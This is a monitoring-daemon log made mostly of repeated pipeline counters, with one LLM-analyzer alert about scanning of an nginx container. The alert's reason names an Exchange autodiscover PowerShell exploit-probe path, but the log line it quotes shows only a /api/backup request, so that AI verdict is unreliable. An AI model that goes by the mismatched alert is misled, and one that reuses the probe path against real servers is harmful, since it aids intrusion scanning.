03:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:31.948753 [observer] Pipeline: processed=1310 pattern_hits=1285 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:31.948778 [observer] Patterns: hash=1285 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:01.941902 [observer] Pipeline: processed=1314 pattern_hits=1289 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:01.942016 [observer] Patterns: hash=1289 
prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:31.944038 [observer] Pipeline: processed=1316 pattern_hits=1291 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:31.944067 [observer] Patterns: hash=1291 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:01.937938 [observer] Pipeline: processed=1320 pattern_hits=1295 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:01.937963 [observer] Patterns: hash=1295 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:31.943535 [observer] Pipeline: processed=1322 pattern_hits=1297 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:31.943565 [observer] Patterns: hash=1297 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:01.959453 [observer] Pipeline: processed=1324 pattern_hits=1299 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:01.959483 [observer] Patterns: hash=1299 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:31.937995 [observer] Pipeline: processed=1328 pattern_hits=1303 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:31.938021 [observer] Patterns: hash=1303 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:01.949140 [observer] Pipeline: processed=1330 pattern_hits=1305 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:46:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 03:46:01.949186 [observer] Patterns: hash=1305 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:31.936296 [observer] Pipeline: processed=1336 pattern_hits=1311 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:31.936326 [observer] Patterns: hash=1311 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:01.970182 [observer] Pipeline: processed=1338 pattern_hits=1313 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:01.970237 [observer] Patterns: hash=1313 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:31.934193 [observer] Pipeline: processed=1342 pattern_hits=1317 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:31.934223 [observer] Patterns: hash=1317 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:01.973639 [observer] Pipeline: processed=1344 pattern_hits=1319 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:01.973675 [observer] Patterns: hash=1319 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:31.943061 [observer] Pipeline: processed=1346 pattern_hits=1321 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:31.943087 [observer] Patterns: hash=1321 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:01.959301 [observer] Pipeline: processed=1350 pattern_hits=1325 llm_calls=25 llm_errors=0 
learned=0 Mar 20 03:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:01.959329 [observer] Patterns: hash=1325 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:31.943684 [observer] Pipeline: processed=1352 pattern_hits=1327 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:31.943713 [observer] Patterns: hash=1327 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:01.975187 [observer] Pipeline: processed=1356 pattern_hits=1331 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:01.975408 [observer] Patterns: hash=1331 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:31.942969 [observer] Pipeline: processed=1358 pattern_hits=1333 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:31.942996 [observer] Patterns: hash=1333 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:01.943354 [observer] Pipeline: processed=1362 pattern_hits=1337 llm_calls=25 llm_errors=0 learned=0 Mar 20 03:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:01.943392 [observer] Patterns: hash=1337 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25 Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809461 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809507 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing an attempt to access /api/backup resulted 
in No such file or directory. This could indicate probing for sensitive endpoints or misconfiguration; not definitive attack but warrants scrutiny. Line=2026-03-20T03:51:20.480006175Z 2026/03/20 03:51:20 [error] 422#422: *744738 open() "/usr/share/nginx/default/api/backup" failed (2: No such file or directory), client: 91.215.85.104, server: _, reques...
Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809587 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:51:20.480113774Z 91.215.85.104 - - [20/Mar/2026:03:51:20 +0000] "54.200.221.0" "GET /api/backup HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101...
Mar 20 03:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:31.935113 [observer] Pipeline: processed=1368 pattern_hits=1342 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:31.935139 [observer] Patterns: hash=1342 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:01.957557 [observer] Pipeline: processed=1370 pattern_hits=1344 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:01.957585 [observer] Patterns: hash=1344 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:31.933732 [observer] Pipeline: processed=1374 pattern_hits=1348 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:31.934457 [observer] Patterns: hash=1348 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20
03:53:01.942902 [observer] Pipeline: processed=1376 pattern_hits=1350 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:01.942934 [observer] Patterns: hash=1350 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:31.938539 [observer] Pipeline: processed=1380 pattern_hits=1354 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:31.938565 [observer] Patterns: hash=1354 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:01.943773 [observer] Pipeline: processed=1382 pattern_hits=1356 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:01.943811 [observer] Patterns: hash=1356 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:31.933855 [observer] Pipeline: processed=1386 pattern_hits=1360 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:31.933878 [observer] Patterns: hash=1360 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:01.947597 [observer] Pipeline: processed=1388 pattern_hits=1362 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:01.947641 [observer] Patterns: hash=1362 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:31.949081 [observer] Pipeline: processed=1390 pattern_hits=1364 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:31.949108 [observer] Patterns: hash=1364 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 
20 03:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:01.944822 [observer] Pipeline: processed=1396 pattern_hits=1370 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:01.944848 [observer] Patterns: hash=1370 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:31.941462 [observer] Pipeline: processed=1400 pattern_hits=1374 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:31.941492 [observer] Patterns: hash=1374 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:01.942504 [observer] Pipeline: processed=1404 pattern_hits=1378 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:01.942541 [observer] Patterns: hash=1378 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:31.944199 [observer] Pipeline: processed=1406 pattern_hits=1380 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:31.944224 [observer] Patterns: hash=1380 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:01.937438 [observer] Pipeline: processed=1410 pattern_hits=1384 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:01.937461 [observer] Patterns: hash=1384 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:31.940359 [observer] Pipeline: processed=1412 pattern_hits=1386 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:31.940392 [observer] Patterns: hash=1386 prefix=0 
regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:01.951786 [observer] Pipeline: processed=1414 pattern_hits=1388 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:01.951813 [observer] Patterns: hash=1388 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 03:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:31.935057 [observer] Pipeline: processed=1418 pattern_hits=1392 llm_calls=26 llm_errors=0 learned=0 Mar 20 03:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:31.935081 [observer] Patterns: hash=1392 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:01.959513 [observer] Pipeline: processed=1420 pattern_hits=1394 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:01.959545 [observer] Patterns: hash=1394 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:31.934797 [observer] Pipeline: processed=1424 pattern_hits=1398 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:31.934820 [observer] Patterns: hash=1398 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:02.063536 [observer] Pipeline: processed=1426 pattern_hits=1400 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:02.065719 [observer] Patterns: hash=1400 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:31.934763 [observer] Pipeline: processed=1432 pattern_hits=1406 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:01:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 04:01:31.934789 [observer] Patterns: hash=1406 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:01.945681 [observer] Pipeline: processed=1434 pattern_hits=1408 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:01.945711 [observer] Patterns: hash=1408 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:31.944183 [observer] Pipeline: processed=1436 pattern_hits=1410 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:31.944210 [observer] Patterns: hash=1410 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:01.938964 [observer] Pipeline: processed=1440 pattern_hits=1414 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:01.938995 [observer] Patterns: hash=1414 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:31.933536 [observer] Pipeline: processed=1442 pattern_hits=1416 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:31.933569 [observer] Patterns: hash=1416 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:01.956126 [observer] Pipeline: processed=1446 pattern_hits=1420 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:01.956330 [observer] Patterns: hash=1420 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:31.933760 [observer] Pipeline: processed=1448 pattern_hits=1422 llm_calls=26 llm_errors=0 
learned=0 Mar 20 04:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:31.934301 [observer] Patterns: hash=1422 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:01.946825 [observer] Pipeline: processed=1452 pattern_hits=1426 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:01.946856 [observer] Patterns: hash=1426 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:31.942061 [observer] Pipeline: processed=1454 pattern_hits=1428 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:31.942087 [observer] Patterns: hash=1428 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:01.955893 [observer] Pipeline: processed=1456 pattern_hits=1430 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:01.955945 [observer] Patterns: hash=1430 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:31.933624 [observer] Pipeline: processed=1460 pattern_hits=1434 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:31.933646 [observer] Patterns: hash=1434 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:01.959808 [observer] Pipeline: processed=1464 pattern_hits=1438 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:01.959837 [observer] Patterns: hash=1438 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:31.933689 [observer] Pipeline: 
processed=1468 pattern_hits=1442 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:31.933715 [observer] Patterns: hash=1442 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:01.950103 [observer] Pipeline: processed=1470 pattern_hits=1444 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:01.950136 [observer] Patterns: hash=1444 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:31.934760 [observer] Pipeline: processed=1474 pattern_hits=1448 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:31.934785 [observer] Patterns: hash=1448 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:01.945150 [observer] Pipeline: processed=1476 pattern_hits=1450 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:01.945205 [observer] Patterns: hash=1450 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:31.951231 [observer] Pipeline: processed=1478 pattern_hits=1452 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:31.951253 [observer] Patterns: hash=1452 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:01.942237 [observer] Pipeline: processed=1482 pattern_hits=1456 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:01.942261 [observer] Patterns: hash=1456 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:10:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 04:10:31.949938 [observer] Pipeline: processed=1484 pattern_hits=1458 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:31.949965 [observer] Patterns: hash=1458 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:01.943940 [observer] Pipeline: processed=1488 pattern_hits=1462 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:01.944814 [observer] Patterns: hash=1462 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:31.933770 [observer] Pipeline: processed=1490 pattern_hits=1464 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:31.933797 [observer] Patterns: hash=1464 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:01.938591 [observer] Pipeline: processed=1496 pattern_hits=1470 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:01.938616 [observer] Patterns: hash=1470 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:31.934824 [observer] Pipeline: processed=1498 pattern_hits=1472 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:31.934853 [observer] Patterns: hash=1472 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:01.943866 [observer] Pipeline: processed=1500 pattern_hits=1474 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:01.943974 [observer] Patterns: hash=1474 prefix=0 regex=0 contains=0 deny=5 
alert=3 suppress=0 misses=26 Mar 20 04:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:31.936808 [observer] Pipeline: processed=1504 pattern_hits=1478 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:31.936834 [observer] Patterns: hash=1478 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:01.953498 [observer] Pipeline: processed=1506 pattern_hits=1480 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:01.953522 [observer] Patterns: hash=1480 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:31.934930 [observer] Pipeline: processed=1510 pattern_hits=1484 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:31.934957 [observer] Patterns: hash=1484 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:01.949082 [observer] Pipeline: processed=1512 pattern_hits=1486 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:01.949194 [observer] Patterns: hash=1486 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:31.934497 [observer] Pipeline: processed=1516 pattern_hits=1490 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:31.934520 [observer] Patterns: hash=1490 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:01.987552 [observer] Pipeline: processed=1518 pattern_hits=1492 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:01.987583 
[observer] Patterns: hash=1492 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:31.951643 [observer] Pipeline: processed=1520 pattern_hits=1494 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:31.951668 [observer] Patterns: hash=1494 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:01.948759 [observer] Pipeline: processed=1526 pattern_hits=1500 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:01.948788 [observer] Patterns: hash=1500 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:31.936025 [observer] Pipeline: processed=1528 pattern_hits=1502 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:31.936054 [observer] Patterns: hash=1502 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:01.991680 [observer] Pipeline: processed=1532 pattern_hits=1506 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:01.992072 [observer] Patterns: hash=1506 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:31.943259 [observer] Pipeline: processed=1534 pattern_hits=1508 llm_calls=26 llm_errors=0 learned=0 Mar 20 04:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:31.943282 [observer] Patterns: hash=1508 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26 Mar 20 04:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:01.941806 [observer] Pipeline: processed=1538 